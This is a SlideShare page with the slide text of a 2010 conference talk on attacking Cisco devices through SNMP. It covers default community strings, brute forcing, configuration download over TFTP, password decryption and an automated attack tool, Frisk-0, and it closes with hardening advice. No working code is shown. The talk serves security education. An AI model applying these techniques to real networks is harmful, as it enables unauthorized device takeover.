SNMP : Simple Network Mediated (Cisco) Pwnage

1,936 views
1,671 views

Published on

Presentation by Grorg Christian Pranschkle at ZaCon 2 in 2010.

This presentation is about SNMP security The presentation begins with an overview of SNMP. SNMP security weaknesses and SNMP security in cisco apps are discussed. Frisk-0 a tool for SNMP Hacking developed by the presenter is also discussed.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,936
On SlideShare
0
From Embeds
0
Number of Embeds
67
Actions
Shares
0
Downloads
36
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

SNMP : Simple Network Mediated (Cisco) Pwnage

  1. 1. SNMPSimple Network Mediated (Cisco) Pwnage Georg-Christian Pranschke 9 October 2010
  2. 2. `whoami`  george@sensepost.com   “Cheorchie”
  3. 3. Agenda  How it all began…  SNMP ?  SNMP from a Security Perspective  SNMP on Cisco Appliances  Exploiting SNMP Misconfigurations  Frisk-0  Secure your SNMP enabled devices  Questions
  4. 4. A Long Time Ago…
  5. 5. How it all began…
  6. 6. SNMP ?
  7. 7. SNMP ?  Simple Network Management Protocol   Monitor and manage devices on the network   Routers   Switches   Bridges   Hubs   IP phones and cameras   Printers   Computers
  8. 8. SNMP ?  UDP: 161 / 162  Manager  Agent  Concepts   MIB – Message Information Block   OID – Object Identifier   PDU – Protocol Data Unit  Versions   1 and 2c vs 3
  9. 9. SNMP ?  Community strings   Think passwords   Read/write
  10. 10. SNMP from a Security Perspective
  11. 11. SNMP from a Security Perspective  Plain-text protocol  UDP   Spoofing  Get/Set-responses contain community string  Community Strings   Defaults: public, private, admin, snmp, snmpd …   Weak Communities: 3 characters !!!   Reuse   Community schemes  User awareness
  12. 12. SNMP from a Security Perspective  Information Disclosure   Internal IP Addresses   Routing Information   Running Processes   Running Services   Installed Software   Usernames   Hardware  Compromise
  13. 13. Cisco
  14. 14. Cisco Appliances S N M P TELNET SSH H T T P
  15. 15. Brute Forcing Cisco Appliances  TELNET   Often only password required   Only three tries – then reconnect   Enable password needs to be brute forced as well  SSH   Needs username and password (ssh -1)   Only three tries per connection   Enable password needs to be brute forced as well  HTTP(S)   Basic Authentication   Fastest so far   No enable password
  16. 16. Brute Forcing Cisco Appliances  SNMP   Almost as fast as we can send UDP packets !   Just community string needed !   Privileged access to the device !
  17. 17. SNMP on Cisco Appliances  Remote Configuration through SNMP   Setting OIDs   Configuration up- and downloads via TFTP   Running config vs Startup config
  18. 18. The Vigenere Cipher  Variation of a Caesar Cipher   Why such a weak cipher ?   Obfuscation at best
  19. 19. Exploiting SNMP Misconfigurations
  20. 20. If the RW community is known…
  21. 21. Frisk-0
  22. 22. The Lab Environment
  23. 23. Frisk-0  ”Rogue Management Interface”   Brute forces community strings   Downloads Running and Startup configurations   Extracts and decrypts all passwords and hashes   Batch mode   From targets file   Network ranges   Spoofing capabilities   “Configlets” (enable TELNET / reset passwords)  Fully automated and unattended
  24. 24. Frisk-0
  25. 25. The GREnd Finale  GRE – Generic Routing Encapsulation
  26. 26. Secure your SNMP enabled devices
  27. 27. Secure Your SNMP Enabled Devices  Do you really need SNMP ?  Do you really need a RW community ?  Set strong community strings   40+ characters ? Why not!  Access-lists   SNMP   TFTP ! (spoofing)   UDP
  28. 28. Questions ?

×